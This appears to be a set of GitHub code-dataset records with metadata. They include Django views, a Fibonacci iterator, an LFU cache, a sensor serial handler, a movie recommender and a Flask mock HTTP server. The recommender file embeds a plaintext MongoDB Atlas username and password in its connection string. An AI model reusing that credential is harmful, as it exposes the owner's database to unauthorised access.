'active': False,\n 'url': reverse_lazy('home')\n },\n 'blog': {\n 'label': 'The Blog',\n 'active': False,\n 'url': reverse_lazy('blog:entry_list')\n }\n }\n\n def __init__(self, *args, **kwargs):\n self.nav = deepcopy(self.NAV_DEFAULT)\n super(NavView, self).__init__(*args, **kwargs)\n\n\nclass HomepageView(NavView):\n\n template = 'pages/home.html'\n\n def get(self, request):\n\n context = {\n 'nav': self.nav\n }\n context.update(CV)\n context['nav']['home']['active'] = True\n\n return render(request, self.template, context=context)\n\n\n\n\n", "repo_name": "the16thpythonist/electronicheart", "sub_path": "electronicheart/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "cv.CV", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "36362980224", "text": "\"\"\"\nIterador para la serie de Fibonacci.\n\nCreamos el iterador como una clase derivada de collections.abc.Iterator.\n\nAutor: Rafael del Castillo Gomariz\n\"\"\"\nfrom typeguard import typechecked\nfrom collections.abc import Iterator\n\n\n@typechecked\nclass FibonacciIterator(Iterator):\n\n def __init__(self, stop: int = 10):\n if stop < 1:\n raise ValueError(\"El máximo de elementos de la serie no puede ser negativo\")\n self.__index = 0\n self.__current = 0\n self.__next = 1\n self.__stop = stop\n\n def __next__(self):\n if self.__index == self.__stop:\n raise StopIteration\n self.__index += 1\n fib_num = self.__current\n self.__current, self.__next = self.__next, self.__current + self.__next\n return fib_num\n\nif __name__ == '__main__':\n print(\"Serie de Fibonacci\")\n print(\"------------------\")\n\n n = int(input(\"¿Cuántos números quiere mostrar? \"))\n for i, fib_n in enumerate(FibonacciIterator(n)):\n print(f\"{i+1}: {fib_n}\")\n", "repo_name": "rdelcastillo/DAW-Python", "sub_path": "ejemplosclase/7iteradores/iterador_fibonacci.py", "file_name": "iterador_fibonacci.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.abc.Iterator", "line_number": 13, "usage_type": "name"}, {"api_name": "typeguard.typechecked", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "30727276831", "text": "import os\nimport time\nfrom celery import Celery\n\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379'),\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', 'redis://localhost:6379')\n\ncelery = Celery('tasks', broker=CELERY_BROKER_URL, backend=CELERY_RESULT_BACKEND)\n\n@celery.task(name='tasks.find_solution')\ndef find_solution(ncs: str, sequence: str, stocks: str) -> str:\n time.sleep(5)\n return 'ncs: {}\\nsequence: {}\\nstock: {}'.format(ncs, sequence, stocks)", "repo_name": "micolaprs/comblabel", "sub_path": "src/queue/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "celery.Celery", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "23882870380", "text": "from collections import defaultdict, OrderedDict\n\nclass LFUCache:\n\n# Approach: Use ordereddict and normal dict, keep updating stack as and when a key is accessed\n# TC: O(1) for get and put functions as we use ordereddict which works like a DLL\n# SC: O(1) + O(1) as capacity of the 2 dicts is constant\n\n def __init__(self, capacity: int):\n self.value_map = {} # To store all keys and their frequencies (key:freq)\n self.freq_map = {} # To store all keys and value in cache in order (freq: {key: val})\n self.capacity = capacity\n self.lowest_frequency = 1\n\n def update_key(self,key: int, value: int = None): \n freq = self.value_map[key]\n if not value:\n # Get operation being performed so retain val\n val = self.freq_map[freq][key]\n else:\n # Put operation for exisiting key, so update val\n val = value\n # 1. Remove entry from freqmap\n del self.freq_map[freq][key] \n # 2. Append to front of freqmap\n if freq+1 in self.freq_map:\n self.freq_map[freq+1][key] = val \n else:\n self.freq_map[freq+1]= defaultdict(OrderedDict)\n self.freq_map[freq+1][key] = val \n # 3. Update freq in valuemap\n self.value_map[key] = freq+1\n \n if self.lowest_frequency == freq and not self.freq_map[freq]: # Update lowest freq\n self.lowest_frequency += 1\n \n return val\n\n def get(self, key: int) -> int:\n if key in self.value_map:\n # If key exists, return and update freq_map and value_map\n return self.update_key(key)\n return -1\n\n def put(self, key: int, value: int) -> None:\n if not key in self.value_map:\n # Adding new entry so check cache capacity \n if not self.capacity:\n # Evict key and value\n if self.lowest_frequency in self.freq_map:\n # 1. Get 1 st key in ordered dict\n first_key = next(iter(self.freq_map[self.lowest_frequency]))\n if len(self.freq_map[self.lowest_frequency]) > 1: \n # 2. If more than one entry for lowest freq, need to evict as per lru\n del self.freq_map[self.lowest_frequency][first_key]\n del self.value_map[first_key]\n else:\n # 3. Only one entry for lowest frew so evict directly\n del self.freq_map[self.lowest_frequency]\n del self.value_map[first_key]\n self.capacity += 1\n if self.capacity:\n # To ensure there is any capacity to begin with \n if 1 not in self.freq_map: # Adding element for first time so freq is 1\n self.freq_map[1] = defaultdict(OrderedDict)\n self.freq_map[1][key] = value # Add key in freqmap\n self.value_map[key] = 1 # Add key in valuemap\n self.lowest_frequency = min(1, self.lowest_frequency) # Update lowest freq\n self.capacity -= 1 # Update capacity\n else:\n # Updating existing entry \n self.update_key(key,value)\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)", "repo_name": "sanafathima418/StriverSDESheet", "sub_path": "Stack/lfu_cache.py", "file_name": "lfu_cache.py", "file_ext": "py", "file_size_in_byte": 3385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 29, "usage_type": "argument"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 65, "usage_type": "argument"}]} +{"seq_id": "41575861174", "text": "import serial \nimport threading\nimport requests\nimport time\nimport random\nimport os\nclass DeviceHandler:\n \n def __init__(self,device_id,location,baud_rate = 9600,serial_port = '/dev/ttyUSB0',server_address = 'http://127.0.0.1:3000/post-data'):\n self.baud_rate = baud_rate\n self.serial_port = serial_port\n self.server_address = server_address \n self.DeviceID = device_id\n self.Location = location\n\n try:\n self.uc = serial.Serial(self.serial_port,self.baud_rate)\n\n except:\n print(\"\\nPermission issues detected while accessing the port.\\n\\tTry running - 'sudo chmod a+rw /dev/ttyUSB0'\\n\")\n exit()\n\n def run(self):\n try:\n FetchedData = self.uc.readline()\n FetchedData = FetchedData.decode(\"utf-8\") \n\n var1,var2,var3,var4 = FetchedData.split('-')\n except:\n print('\\nHaving issues with decoding...')\n return\n\n\n data ={\n 'CO2':var1.strip(),\n 'CO':var2.strip(),\n 'CH4':var3.strip(),\n 'AIRQ':var4.strip(),\n 'DeviceID': self.DeviceID,\n 'location': self.Location\n }\n try:\n r = requests.post(self.server_address,data)\n except:\n os.system('clear')\n print('\\n\\tServer not responding...Make sure its up and running\\n\\t\\tReconnecting in 10 secs..')\n time.sleep(10)\n return\n print('\\n\\tValue Sent -> ' + str(data['CO2'])+\" \"+str(data['CO'])+\" \"+str(data['CH4'])) \n\n\n\nif __name__ == \"__main__\":\n \n handler = DeviceHandler(device_id = 'JAGAT2019',location = 'Jagatpura')\n \n while True:\n handler.run()\n time.sleep(10)\n", "repo_name": "mayankt28/YU", "sub_path": "RPi-Code/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "serial.Serial", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 43, "usage_type": "call"}, {"api_name": "os.system", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "15201616342", "text": "#!/usr/bin/env python\n#\n# This file is part of cpu_cores released under the MIT license.\n# See the LICENSE file for more information.\n\nfrom setuptools import setup, find_packages\nimport cpu_cores\n\nDESCRIPTION = \"cpu_cores-py is a small python library to get the number of\" +\\\n \"'real physical' cpu cores of a linux/osx box\"\ntry:\n with open('PIP.rst') as f:\n LONG_DESCRIPTION = f.read()\nexcept IOError:\n LONG_DESCRIPTION = DESCRIPTION\n\nwith open('pip-requirements.txt') as reqs:\n install_requires = [\n line for line in reqs.read().split('\\n') if (line and not\n line.startswith('--'))]\n\nsetup(\n name='cpu_cores',\n version=cpu_cores.__version__,\n author=\"Fabien MARTY\",\n author_email=\"fabien.marty@gmail.com\",\n url=\"https://github.com/thefab/cpu_cores\",\n packages=find_packages(),\n license='MIT',\n download_url='https://github.com/thefab/cpu_cores',\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n scripts=[\"scripts/get_cpu_physical_cores.py\"],\n install_requires=install_requires,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Utilities',\n 'Topic :: System :: Hardware',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development',\n ]\n)\n", "repo_name": "thefab/cpu_cores", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "cpu_cores.__version__", "line_number": 24, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "32379609335", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'dns_records'\nurlpatterns = [\n path('', views.DnsRecordListView.as_view(), name='list'),\n path('export/', views.ZoneExportView.as_view(), name='zone_export'),\n path('import/', views.ZoneImportView.as_view(), name='zone_import'),\n path('create/', views.DnsRecordCreateView.as_view(), name='create'),\n path('/', views.DnsRecordDetailView.as_view(), name='detail'),\n path('/update/', views.DnsRecordUpdateView.as_view(), name='update'),\n path('/delete/', views.DnsRecordDeleteView.as_view(), name='delete'),\n]\n", "repo_name": "sjy5386/flare-core", "sub_path": "records/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "18224127194", "text": "# author: @iamtienng\n# import tools for saving model in database\nimport pickle\n\n# import tools for machine learning model\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n# import machine learning model\nfrom recommendation_system.matrix_factorization import MatrixFactorization\n\n# import tools for database\nfrom pymongo import MongoClient\nimport bson\n\n# connect to the database\n# usernameDB = \"iamtienng\"\n# passwordDB = \"d4O8CmCGCeCI8vzA\"\nclient = MongoClient(\n 'mongodb+srv://iamtienng:d4O8CmCGCeCI8vzA@mrsbbdb.wqcrinp.mongodb.net/?retryWrites=true&w=majority')\n# localhost\n# client = MongoClient(\"localhost\", 27017)\ndb = client[\"MRSBBDB\"]\n# YOU MUST import ratings through MongoDBCompass\n# YOU MUST import movies through MongoDBCompass\n\n# load models for mfcf model if the model does not exist in the database\nW = np.asarray([])\nX = np.asarray([])\nd = np.asarray([])\nb = np.asarray([])\nif len(list(db[\"model\"].find())) == 0:\n W = np.loadtxt('./data/W.csv', delimiter=',')\n X = np.loadtxt('./data/X.csv', delimiter=',')\n d = np.loadtxt('./data/d.csv', delimiter=',')\n b = np.loadtxt('./data/b.csv', delimiter=',')\n\n wf = {\"name\": \"W\", \"value\": bson.Binary(pickle.dumps(W, protocol=2))}\n xf = {\"name\": \"X\", \"value\": bson.Binary(pickle.dumps(X, protocol=2))}\n df = {\"name\": \"d\", \"value\": d.tolist()}\n bf = {\"name\": \"b\", \"value\": b.tolist()}\n\n db[\"model\"].insert_one(wf)\n db[\"model\"].insert_one(xf)\n db[\"model\"].insert_one(df)\n db[\"model\"].insert_one(bf)\nelse:\n for model in db[\"model\"].find():\n if model['name'] == \"W\":\n W = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"X\":\n X = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"d\":\n d = np.asarray(model['value'])\n elif model['name'] == \"b\":\n b = np.asarray(model['value'])\n\n# load all ratings as utility matrix for mfcf model\nratings_cursor = db['rating'].find()\nratings_dataframe = pd.DataFrame(list(ratings_cursor), columns=[\n 'userId', 'movieId', 'rating', 'timestamp']).astype({'userId': int, 'movieId': int, 'rating': int, })\nratings_matrix = np.asmatrix(ratings_dataframe)\nrate_train, rate_test = train_test_split(\n ratings_matrix, test_size=0.2, random_state=10)\n\n# mfcf machine learning model\nmfcf_model = MatrixFactorization(\n Y=ratings_matrix, K=50, lam=.01, Xinit=X, Winit=W, bInit=b, dInit=d, learning_rate=50, max_iter=30)\n", "repo_name": "iamtienng/movie-recommendation-system", "sub_path": "mrsbb/BackEnd/mrsbb-be/extensions.py", "file_name": "extensions.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymongo.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 51, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.asmatrix", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "recommendation_system.matrix_factorization.MatrixFactorization", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "20852606899", "text": "from flask import Flask, request\nimport flask\nfrom flask.globals import session\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom werkzeug.datastructures import Accept\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime, date\nimport xmltodict\nimport random\nimport base64\nimport json\nimport ipaddress\n\napp = Flask(__name__)\nauth = HTTPBasicAuth()\nbearer = HTTPTokenAuth(scheme='Bearer')\n\njson_data = {\n \"response\": {\n \"status\": \"success\",\n \"name\": \"http mock server\",\n \"date\": date.today(),\n \"time\": datetime.now().strftime(\"%H:%M:%S\"),\n \"details\": {\n \"id\": \"12345\",\n \"name\": \"dummy data\",\n \"description\": \"ubot testing for generic http servers\"\n },\n \"data\": []\n }\n}\n\nid = 3896\n\nxml_data = xmltodict.unparse(json_data, pretty=True)\n\nusers = {\n 'admin': generate_password_hash('admin')\n}\n\ntokens = dict()\nsessions = dict()\nallocated = dict()\n\n@auth.verify_password\ndef verify_password(username, password):\n if username in users and check_password_hash(users.get(username), password):\n return username\n\n@bearer.verify_token\ndef verify_token(token):\n if token in tokens:\n return tokens[token]\n\n@app.route('/', methods=['GET'])\ndef get_endpoints():\n ep_dict = {\n 'endpoints': {\n 'GET': '/api/v1/get_data',\n 'POST': '/api/v1/post_data',\n 'PUT': '/api/v1/modify_data',\n 'PATCH': '/api/v1/modify_data',\n 'DELETE': '/api/v1/remove_data',\n 'HEAD': '/api/v1/head',\n 'RESET': '/api/v1/reset_data',\n 'TEST TOKEN': '/token-auth',\n 'GET TOKEN (header)': '/api/v1/get-token',\n 'GET TOKEN': '/api/v2/get_token',\n 'GET SESSION': '/api/v2/get_session',\n 'ALLOCATE': '/api/v2/allocate',\n 'DEALLOVATE': '/api/v2/deallocate'\n }\n }\n if request.headers.get('accept') == 'application/xml':\n return xmltodict.unparse(ep_dict, pretty=True), 200\n else:\n return ep_dict, 200\n\n\ndef print_globals(task):\n print(\"-------------------\", task, \"--------------------\")\n print(\"tokens: \", tokens)\n print(\"sessions: \", sessions)\n print(\"allocated: \", allocated)\n print(\"-------------------------------------------------\")\n\n@app.route('/api/v2/get_token', methods=['POST'])\ndef get_access_token():\n global tokens\n data = json.loads(request.get_data().decode())\n username = data.get('user')\n num = random.randint(10000, 99999)\n tm = datetime.now()\n token_string = f'{tm}{username}{num}'\n token = base64.b64encode(token_string.encode()).decode()\n tokens[token] = username\n return f'\"token\": \"{token}\"', 200\n\n\n@app.route('/api/v2/get_session', methods=['POST'])\ndef get_session():\n global sessions\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n if token not in tokens:\n return \"Invalid token\", 400\n session_id = random.randint(20124, 99999)\n sessions[session_id] = token\n return f'\"session-id\": \"{session_id}\"', 200\n\n\n@app.route('/api/v2/allocate', methods=['POST'])\ndef allocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n subnet = data.get('subnet')\n network = ipaddress.ip_network(subnet)\n for add in network.hosts():\n if add not in allocated.values():\n allocated[int(session)] = add\n return f'\"ip-address\": \"{add}\"', 200\n return 'no address available', 400\n\n\n@app.route('/api/v2/deallocate', methods=['POST'])\ndef deallocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n if int(session) in allocated:\n del allocated[int(session)]\n return \"Deallocated\", 200\n\n\n@app.route('/api/v1/get_data', methods=['GET'])\ndef get_data():\n try:\n accept = request.headers.get('accept')\n if accept == 'application/xml':\n xml_data = xmltodict.unparse(json_data, pretty=True)\n return xml_data, 200\n else:\n return json_data, 200\n except Exception as e:\n return f\"{e}\", 500\n\n@app.route('/api/v1/get_data/', methods=['GET'])\ndef get_data_by_id(id):\n try:\n print(id)\n final_data = {\n \"msg\": \"no data found\"\n }\n data = json_data.get('response').get('data')\n for d in data:\n print(d.get('id'))\n if d.get('id') and str(d.get('id')) == id:\n final_data = d\n accept = request.headers.get('accept')\n if accept == 'application/xml':\n return xmltodict.unparse(final_data, pretty=True), 200\n else:\n return final_data, 200\n except Exception as e:\n return f\"{e}\", 500\n\n\ndef update(success_code):\n global id\n try:\n data = None\n content_type = request.headers.get('Content-Type')\n print(content_type)\n if content_type == 'application/json':\n data = request.get_json()\n data['id'] = id\n id = id+1\n input_type = 'json'\n elif content_type == 'application/xml':\n data = request.get_data().decode()\n try:\n data_dict = xmltodict.parse(data)\n data = xmltodict.unparse(data_dict, pretty=True)\n input_type = 'xml'\n except Exception as e:\n return {\n 'status': 'failure',\n 'msg': f'invalid xml: {e}'\n }, 400\n elif content_type == 'application/x-www-form-urlencoded':\n print('step-1')\n data = request.form\n print(data)\n input_type = 'form data'\n elif 'multipart/form-data' in content_type:\n data = request.form\n files = request.files\n print(files)\n input_type = 'mulitpart form data'\n else:\n data = request.get_data().decode()\n input_type = 'raw data'\n if data is not None and data != \"\":\n try:\n json_data['response']['data'].append(data)\n except Exception as e:\n pass\n finally:\n return {\n 'status': 'success',\n 'msg': 'valid input',\n 'input-type': input_type,\n 'input': data\n }, success_code\n else:\n return {\n 'status': 'success',\n 'msg': 'input is None'\n }, success_code\n except Exception as e:\n print(e)\n return {\n 'status': 'failure',\n 'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/create_data', methods=['POST'])\ndef post_data():\n return update(201)\n\n\n@app.route('/api/v1/modify_data/', methods=['PUT', 'PATCH'])\ndef put_data(id):\n return update(202)\n\n@app.route('/api/v1/reset_data', methods=['POST'])\ndef reset():\n json_data['response']['data'] = []\n return \"\", 204\n\n\n@app.route('/api/v1/remove_data', methods=['DELETE'])\ndef delete_data():\n try:\n data = \"\"\n if len(request.args.to_dict().keys()) != 0:\n for key in request.args.keys():\n data = f'{data}{key}={request.args.get(key)} '\n return {\n 'status': 'success',\n 'msg': f'Data deleted for {data}'\n }, 202\n elif request.get_data().decode() != \"\":\n data = request.get_data().decode()\n if request.headers['content-type'] == 'application/json':\n data = json.loads(data)\n return {\n 'status': 'success',\n 'msg': f'Data deleted for {data}'\n }, 202\n else:\n return \"\", 204\n except Exception as e:\n return {\n 'status': 'failure',\n 'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/head', methods=['HEAD'])\ndef head():\n return {\"content\": \"some content\"}, 202\n\n@app.route('/api/v1/get-token', methods=['GET'])\n@auth.login_required\ndef get_token():\n global tokens\n username = auth.username()\n token = 'MjAyMS0wOS0yOCAwNTozNTo1Mi44MDg1NTNhZG1pbjQzNzM0'\n tokens[token] = username\n response = flask.Response()\n print(token)\n response.headers['Access-token'] = token\n return response\n\n@app.route('/token-auth', methods=['GET'])\n@bearer.login_required\ndef test_token_auth():\n return f\"welcome {bearer.current_user()}\", 200\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)", "repo_name": "shiv6/mock-server", "sub_path": "mock_server.py", "file_name": "mock_server.py", "file_ext": "py", "file_size_in_byte": 8970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPBasicAuth", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPTokenAuth", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 35, "usage_type": "call"}, {"api_name": "werkzeug.security.generate_password_hash", "line_number": 38, "usage_type": "call"}, {"api_name": "werkzeug.security.check_password_hash", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 75, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 95, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 117, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 119, "usage_type": "argument"}, {"api_name": "ipaddress.ip_network", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.globals.session", "line_number": 125, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 135, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 137, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 139, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 140, "usage_type": "argument"}, {"api_name": "flask.request.headers.get", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 184, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "xmltodict.parse", "line_number": 191, "usage_type": "call"}, {"api_name": "xmltodict.unparse", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 201, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 206, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 210, "usage_type": "name"}, {"api_name": "flask.request.args.to_dict", "line_number": 255, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 255, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.request.args.keys", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 262, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 264, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 289, "usage_type": "call"}]} +{"seq_id": "4559228483", "text": "#!/usr/bin/env python3\n\"\"\"Tests signal 